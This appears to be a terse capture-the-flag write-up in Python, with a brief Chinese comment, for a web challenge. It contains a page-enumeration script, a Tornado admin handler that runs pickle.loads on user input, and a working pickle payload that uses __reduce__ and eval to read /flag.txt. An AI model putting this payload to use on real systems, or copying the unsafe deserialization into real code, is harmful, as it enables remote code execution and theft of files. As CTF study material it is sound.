import requests
for i in range(512):
url = f"http://78cd9dcd-96d8-4fb8-9785-be448ad9dc9e.node3.buuoj.cn/shop?page={i}"
response = requests.get(url=url)
if response.text.find("lv6.png") != -1:
print(i)
break
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib
class AdminHandler(BaseHandler):
@tornado.web.authenticated
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
__reduce__方法在反序列化时被调用,类似PHP的wakeup,参考王叹之的脚本。
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
